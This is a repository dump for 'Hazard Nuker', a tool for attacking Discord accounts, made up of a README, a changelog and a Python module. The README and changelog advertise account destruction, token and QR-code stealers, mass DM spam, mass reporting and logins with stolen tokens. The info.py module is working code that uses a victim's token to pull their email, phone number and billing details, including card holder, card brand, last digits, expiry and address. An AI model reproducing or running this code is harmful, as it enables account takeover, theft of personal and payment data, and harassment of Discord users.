README.md
<p align= center</p><a href="https://cheataway.com" target="_blank"><img src="https://i.imgur.com/NuuUSUK.png" alt="HazardNuker"></a>
<p align="center">
<img src="https://img.shields.io/github/languages/top/KDot227/hazard-nuker-mirror?style=flat-square" </a>
<img src="https://img.shields.io/github/last-commit/KDot227/hazard-nuker-mirror?style=flat-square" </a>
<img src="https://sonarcloud.io/api/project_badges/measure?project=Rdimo_Hazard-Nuker&metric=ncloc" </a>
<img src="https://img.shields.io/github/license/KDot227/hazard-nuker-mirror?style=flat-square" </a>
<img src="https://img.shields.io/github/downloads/KDot227/hazard-nuker-mirror/total?color=%23daff00&label=1.4.7 Downloads&style=flat-square" </a>
<img src="https://img.shields.io/github/stars/KDot227/hazard-nuker-mirror?color=%23daff00&label=Stars&style=flat-square" </a>
<img src="https://img.shields.io/github/forks/KDot227/hazard-nuker-mirror?color=%23daff00&label=Forks&style=flat-square" </a>
</p>
<p align="center">
<a href="https://github.com/KDot227/hazard-nuker-mirror#installation">Installation</a> |
<a href="https://github.com/KDot227/hazard-nuker-mirror#Important">Important</a> |
<a href="https://github.com/KDot227/hazard-nuker-mirror/blob/master/Changelog.md">Changelogs</a> |
<a href="https://cheataway.com">Discord</a>
</p>

---

**NOTE:** Hazard is not finished! You can expect bugs, crashes, and non-working functions. Please make an issue if you find a bug!
ㅤ
#### Hazard Nuker was made with
Love ❌ <br>
Code ✅

<h1 allign="center">- Features -</h1>

* ` Settings (Change the Color Theme, Thread Amount, Hotkeys and more!)`
* ` Both Compact and Feature-Rich`
* ` QoL Features such as Auto-Update, proxy scraping and more!`
* ` Easy to use!`
* ` Fast and Efficient (Low Performance Impact)`
* ` Linux Support! (Expect Bugs)`
* ` Create a token logger or QR code stealer!`
* ` Nuke an account!`
* ` Change an accounts Status, Bio, or HypeSquad house!`
* ` Mass DM using an account!`
* ` Log into an account with an isolated browser!`
* ` Mass Report a user or server!`
* ` Group Chat Spam!`
* ` Webhook Nuker/Deleter`
* ` And much, much more!`

## Features in detail

<details>
<summary>All features in detail! (Drop Down)</summary>

#### [1] Nuke a targetted account 
* Basically all account nuker-based options
* Uses **Everything**! (Mass DM, Create & Delete Servers, Change Language and Theme)
* It will remove all their friends and DMs as well
* Basically, it will shit on their account.
* Everything is logged in the command window, so you can see it all happening in real time

#### [2] Unfriend all friends
* Removes all friends from the victim

#### [3] Delete and leave all servers
* Leaves/Deletes any servers a user is in

#### [4] Spam Create New servers
* Creates 100 servers! 
* Can choose a server icon aswell as a name or have it pick a random one.

#### [5] DM Deleter
* Closes/Deletes all DMs with other users! (Will also leave group chats)

#### [6] Mass DM
* Message all friends of a user with a custom message!

#### [7] Enable seizure mode
* Switches between Light & Dark mode every second or so!
* Also cycles through all the languages.

#### [8] Get information from a targetted account
Returns a lot of user info based on a token!
* Username, Discriminator, Creation Date and other user info!
* Their personal info (such as Language, Creation Date, Email and more!)
* Their avatar URL, 2FA status, Nitro Info (Type & Days left, if they have Nitro)
* Payment method, and basic info about it (Address, Number, Payment Status, PayPal info if they use that)
* Geolocational Info, such as their Country, Region, City and more!
* And all the other info you could think of!

#### [9] Log into an account
* Log into a users account with their token!
* Supports Chrome, Edge, and Opera!

#### [10] Block Friends
* Blocks all their friends

#### [11] Profile Changer
* Allows you to modify their Status, Bio, and Hypequad Badge.

#### [12] COMING SOON!
<img alt="HazardNukerSneakPeek" src="https://user-images.githubusercontent.com/80375661/159819747-52ebb340-6350-4639-a6e1-abfdfd1f80a0.png" width="65%">

#### [13] Create Token Grabber
Creates a token logger based off the **Hazard Stealer V2!**
(You can find a link to the source code [here](https://github.com/Rdimo/Hazard-Token-Grabber-V2))

<p align="left"><img src="https://user-images.githubusercontent.com/80375661/159514536-d8249923-adbe-4b9e-a187-6b028941f4a7.png"</p>

#### [14] QR Code Grabber
Creates a QR code! If someone scans the QR code, you can gain access to their account!
> The webhook notification looks like this:

<p align="left"><img src="https://raw.githubusercontent.com/Rdimo/images/master/Hazard-Nuker/QR-code.jpg"</p>

#### [15] Mass Report
* Reports a user until you stop it.

#### [16] GroupChat Spammer
* Create a bunch of GCs with a specified user or random ones.

#### [17] Webhook Destroyer
* Spam & Delete any valid webhook!

#### [18] Settings
Change the following:
* Theme
* Threads
* Hotkeys
* Exit
</details>

---

### ❗ Important
* Found a bug? Join the [Discord](https://cheataway.com/invite) and contact me (Rdimo) or create an issue about it directly in [here!](https://github.com/KDot227/hazard-nuker-mirror/issues/new/choose)
> **WARNING:** Many people have been selling/distributing infected versions of Hazard Nuker.
> **DO NOT** install Hazard Nuker from any place other than this page. If you install it from somewhere else, expect to be **Hacked/Scammed.**

## 🤓 Dear Skids
**Good for you,** you decided to skid something. <br>
We can't stop you, but just know you're pathetic. <br>
<br>
I hope you end up on the streets begging for spare change.

## Installation 

#### Compiled Version (Easier but more buggy)
```sh-session
Visit: https://github.com/KDot227/hazard-nuker-mirror/releases
Download the latest release (Hazard.zip) and extract the EXE to your desktop.
Finally, run the executable and enjoy!
```

#### Source Code Version (More complicated but less buggy)
```sh-session
Click the green "Code" button.
Click "Download ZIP"
Extract the ZIP to a folder.

Run setup.bat, which will install all dependencies and open the script.
After that, every time you'd like to use Hazard, simply open start.bat

NOTE: Make sure you have Python 3.9.5 or above installed from python.org (NOT MICROSOFT) & added to path.
```

---

🌟 **Enjoyed Hazard Nuker?** Consider dropping a star :)

<a href="https://cheataway.com" target="_blank"><img src="https://cdn.discordapp.com/avatars/1026078415754887168/361f632df71851579af62750e6897b8f.png?size=256" alt="Cheataway"/></a>

**Hazard Stealer was created by Rdimo & DeKrypt. + Maintained by K.Dot227**

Discord: Rdimo#6969 | DeKrypt#7777 | K.Dot#7122

Website: https://cheataway.com/

Server: https://cheataway.com/invite


Changelog.md
<p align= center</p><a href="https://cheataway.com" target="_blank"><img src="https://cdn.discordapp.com/attachments/853347983639052318/858485202157699092/Hazard_Nuker_Banner.png" alt="HazardNuker"></a>

### 2022-03-27, v1.4.7
* ` Fixed bugs`

### 2022-03-27, v1.4.6
* ` Updated Qr-code.zip url`
* ` cleaned some code`

### 2022-02-11, v1.4.5
* ` Fixed a big bug with the token grabber creator`

### 2022-02-10, v1.4.4
* ` Just bug fixes`

### 2022-02-07, v1.4.3
* ` Checks if the token is phone locked now`
* ` Removed the cancel key for every options except seizure because it really had no use and don't think anyone gonna stop mid server spamming`
* ` Neon theme looks better now, the old one was ass`
* ` Some errors are more clearer now, and easier to traceback`
* ` Added opera stable browser support`
* ` Fixed the threading a bit and improved it`
* ` General bug fixes`

### 2022-01-25, v1.4.2
* ` Finished option 11`
* ` So now you can change the users bio and hypesquad badge`

### 2022-01-23, v1.4.1
* ` Drastically changed the file size of hazard grabber.v2 + fixed bugs and made it more efficient etc...`
* ` Qr code grabber[14] now works again since discord updated it a little`
* ` Added more browser support for option [9] (login account) so if you dont have google it will try either google, edge and soon opera stable`
* ` Fixed bug were hazard grabber.v2 didnt work if you choose to obfuscated it` 

### 2022-01-19, v1.4.0
* ` New option! Changed exit to settings so you can customize alot of stuff with hazard now like themes`
* ` New option! profile changer, edit the users status, bio and hypesquad badge!` 
* ` New option! friend blocker (replaced from disable token)` 
* ` Themes! You can select a theme for hazard now, the theme will also be stored for the next time you open up hazard!`
* ` Threads! You can select amount of threads that hazard will send out! More threads = faster but dont have to many (default is 3 + the threads **don't** apply for every option)`
* ` Cancel Key! When using an option like seizure for example, you can cancel the operation at any time by pressing your cancel key! (default key is ctrl+x)`
* ` You can now choose if you want to obfuscate hazard stealer v2 (not gonna make the obfuscation op since this is a free tool)`
* ` Added option to have a server icon of you choice when spamming servers`
* ` Added option to have random server name when spamming servers (suggestion from needhelpn (https://github.com/Rdimo/Hazard-Nuker/issues/53))`
* ` All options are now 3x faster`
* ` Alot better proxy scraping`
* ` It now checks if you got the libs installed, thought I did this earlier but no`
* ` Made the webhook checker alot better`
* ` Made the token checker alot better`
* ` Made the login function (option 9) faster`
* ` Qr Code grabber now looks cleaner and grabs more info ;)`
* ` Removed the progressbar`
* ` fixed bug were seizure mode would not switch to dark mode and only stay on light`
* ` fixed bug were you couldn't install chromedriver since they removed it, so I made my own`
* ` fixed bug were you got blocked for requesting too much to scrape proxies is now fixed since hazard grabs from alot more urls`
> **THIS IS THE FIRST PART OF THE UPDATE SINCE SO MANY OF YOU WANTED IT OUT QUICKLY EXPECT ALOT OF BUGS AND IF YOU FIND ANY PLEASE TELL ME**

### 2021-11-7, v1.3.3
* ` New option! Groupchat Spammer (suggestion from JayH4x (https://github.com/Rdimo/Hazard-Nuker/issues/18))`
* ` Added proxies! dw it auto scrapes proxies for you so the whole proccess is automated`
* ` Made it web scrape the download url for auto update`
* ` New setup to make it easier to start hazard`
* ` Fixed the qr code scanner, since it got patched`
* ` Fixed bug where the servers wouldn't get left (they won't be deleted, haven't figured out how to fix that one since discord patched it)`
> **even though I use proxies you might still get ratelimited and I will fix alot better proxies and proxy system for this in the future!**

### 2021-10-27, v1.3.2
* ` Fixed Mass Report`
* ` For those wondering why my github wasn't visible it was because I got flagged for a while but I'm back now and unflagged!`

### 2021-10-16, v1.3.1
* ` New option! Create Stealer (https://github.com/Rdimo/Hazard-Token-Grabber-V2)`
* ` Should hopefully fully Support Linux Now!`
* ` Auto update now works for both compiled and source code users`
* ` Enabled logs when creating the loggers`
* ` Updated every api to v9`
* ` Fixed bug where seizure mode would go on forever after account nuker`
* ` Fixed bug where the servers wouldn't get deleted/left`

### 2021-9-26, v1.3.0
* ` Eyy source code release as promised`
* ` Fixed some stuff too but don't remember what I fixed`

### 2021-9-22, v1.2.9
* ` Made it so the title changes depending on what your doing now`
* ` Fixed a bug where the title didn't change`
* ` Fixed bug where the qr code grabber would crash`
* ` Fixed token grabber bug, yet again`

### 2021-9-19, v1.2.8
* ` New option! Mass DM, basically just dm's every friend that they have`
* ` Made it show the name instead of the id when removing friends, dms, guild etc except for when using dm spam since that was a pain to fix`
* ` All options runs 100x faster since I abuse threads now`
* ` Hazard runs alot smoother now since I cleaned up the code`
* ` Fixed a bug with the token grabber that it wouldn't install pyinstaller for you`
* ` Fixed a bug were the token grabber wouldn't grab passwords sometimes`

### 2021-9-13, v1.2.7
* ` Fixed a bug with token grabber since I forgot to remove on thing`
* ` Made it more clear when Hazard Nuker fails to update`
* ` Made it more clear on what to do with QR code grabber`

### 2021-9-13, v1.2.6
* ` Fixed a error that you couldn't create token grabber`
* ` Fixed Error Webhook a little`
* ` Made QR code grabber a little bit more clear`

### 2021-9-13, v1.2.5
* ` New option! QR Code grabber! Create a qr code and send it to users to steal their token!`

util/info.py
# Hazard was proudly coded by Rdimo (https://github.com/Rdimo).
# Copyright (c) 2021 Rdimo#6969 | https://Cheataway.com
# Hazard Nuker under the GNU General Public Liscense v2 (1991).

import requests
import Hazard

from datetime import datetime
from colorama import Fore

from util.plugins.common import getheaders

def Info(token):
    r = requests.get('https://discord.com/api/v9/users/@me', headers=getheaders(token))
    cc_digits = {
    'american express': '3',
    'visa': '4',
    'mastercard': '5'
}
    badges = ""

    Discord_Employee = 1
    Partnered_Server_Owner = 2
    HypeSquad_Events = 4
    Bug_Hunter_Level_1 = 8
    House_Bravery = 64
    House_Brilliance = 128
    House_Balance = 256
    Early_Supporter = 512
    Bug_Hunter_Level_2 = 16384
    Early_Verified_Bot_Developer = 131072

    flags = r.json()['flags']
    if (flags == Discord_Employee):
        badges += "Staff, "
    if (flags == Partnered_Server_Owner):
        badges += "Partner, "
    if (flags == HypeSquad_Events):
        badges += "Hypesquad Event, "
    if (flags == Bug_Hunter_Level_1):
        badges += "Green Bughunter, "
    if (flags == House_Bravery):
        badges += "Hypesquad Bravery, "
    if (flags == House_Brilliance):
        badges += "HypeSquad Brillance, "
    if (flags == House_Balance):
        badges += "HypeSquad Balance, "
    if (flags == Early_Supporter):
        badges += "Early Supporter, "
    if (flags == Bug_Hunter_Level_2):
        badges += "Gold BugHunter, "
    if (flags == Early_Verified_Bot_Developer):
        badges += "Verified Bot Developer, "
    if (badges == ""):
        badges = "None"

    userName = r.json()['username'] + '#' + r.json()['discriminator']
    userID = r.json()['id']
    phone = r.json()['phone']
    email = r.json()['email']
    language = r.json()['locale']
    mfa = r.json()['mfa_enabled']
    avatar_id = r.json()['avatar']
    has_nitro = False
    res = requests.get('https://discordapp.com/api/v9/users/@me/billing/subscriptions', headers=getheaders(token))
    nitro_data = res.json()
    has_nitro = bool(len(nitro_data) > 0)
    avatar_url = f'https://cdn.discordapp.com/avatars/{userID}/{avatar_id}.webp'
    creation_date = datetime.utcfromtimestamp(((int(userID) >> 22) + 1420070400000) / 1000).strftime('%d-%m-%Y %H:%M:%S UTC')

    if has_nitro:
        d1 = datetime.strptime(nitro_data[0]["current_period_end"].split('.')[0], "%Y-%m-%dT%H:%M:%S")
        d2 = datetime.strptime(nitro_data[0]["current_period_start"].split('.')[0], "%Y-%m-%dT%H:%M:%S")
        days_left = abs((d2 - d1).days)

    billing_info = []
    for x in requests.get('https://discordapp.com/api/v9/users/@me/billing/payment-sources', headers=getheaders(token)).json():
        y = x['billing_address']
        name = y['name']
        address_1 = y['line_1']
        address_2 = y['line_2']
        city = y['city']
        postal_code = y['postal_code']
        state = y['state']
        country = y['country']
        if x['type'] == 1:
            cc_brand = x['brand']
            cc_first = cc_digits.get(cc_brand)
            cc_last = x['last_4']
            cc_month = str(x['expires_month'])
            cc_year = str(x['expires_year'])
            data = {
                'Payment Type': 'Credit Card',
                'Valid': not x['invalid'],
                'CC Holder Name': name,
                'CC Brand': cc_brand.title(),
                'CC Number': ''.join(z if (i + 1) % 2 else z + ' ' for i, z in enumerate((cc_first if cc_first else '*') + ('*' * 11) + cc_last)),
                'CC Exp. Date': ('0' + cc_month if len(cc_month) < 2 else cc_month) + '/' + cc_year[2:4],
                'Address 1': address_1,
                'Address 2': address_2 if address_2 else '',
                'City': city,
                'Postal Code': postal_code,
                'State': state if state else '',
                'Country': country,
                'Default Payment': x['default']
            }
        elif x['type'] == 2:
            data = {
                'Payment Type': 'PayPal',
                'Valid': not x['invalid'],
                'PayPal Name': name,
                'PayPal Email': x['email'],
                'Address 1': address_1,
                'Address 2': address_2 if address_2 else '',
                'City': city,
                'Postal Code': postal_code,
                'State': state if state else '',
                'Country': country,
                'Default Payment': x['default']
            }
        billing_info.append(data)
        
    print(f'''
    {Fore.RESET}{Fore.GREEN}<<────────────{userName}────────────>>{Fore.RESET}
    [{Fore.RED}User ID{Fore.RESET}]         {userID}
    [{Fore.RED}Created at{Fore.RESET}]      {creation_date}
    [{Fore.RED}Language{Fore.RESET}]        {language}
    [{Fore.RED}Badges{Fore.RESET}]          {badges}
    [{Fore.RED}Avatar URL{Fore.RESET}]      {avatar_url if avatar_id else ""}
    [{Fore.RED}Token{Fore.RESET}]           {token}
    {Fore.RESET}{Fore.GREEN}<───────────Security Info───────────>{Fore.RESET}
    [{Fore.RED}2 Factor{Fore.RESET}]        {mfa}
    [{Fore.RED}Email{Fore.RESET}]           {email}
    [{Fore.RED}Phone number{Fore.RESET}]    {phone if phone else ""}
    {Fore.RESET}{Fore.GREEN}<────────────Nitro Info─────────────>{Fore.RESET}
    [{Fore.RED}Nitro Status{Fore.RESET}]    {has_nitro}
    [{Fore.RED}Expires in{Fore.RESET}]      {days_left if has_nitro else "0"} day(s)
                ''')
    if len(billing_info) > 0:
        print(f"\t\t{Fore.RESET}{Fore.GREEN}<────────────Billing Info────────────>{Fore.RESET}")
        if len(billing_info) == 1:
            for x in billing_info:
                for key, val in x.items():
                    if not val:
                        continue
                    print(f"[{Fore.RED}"+'{:<23}{:<10}{}'.format(key+Fore.RED+Fore.RESET+"]", Fore.RESET, val))
        else:
            for i, x in enumerate(billing_info):
                title = f'Payment Method #{i + 1} ({x["Payment Type"]})'
                print('' + title)
                print('' + ('=' * len(title)))
                for j, (key, val) in enumerate(x.items()):
                    if not val or j == 0:
                        continue
                    print(f"[{Fore.RED}"+'{:<23}{:<10}{}'.format(key+Fore.RED+Fore.RESET+"]", Fore.RESET, val))
                if i < len(billing_info) - 1:
                    print(f'{Fore.RESET}\n')
        print(f'{Fore.RESET}')
    input(f'{Fore.GREEN}[{Fore.YELLOW}>>>{Fore.GREEN}] {Fore.RESET}Enter anything to continue . . .  {Fore.RED}')
    Hazard.main()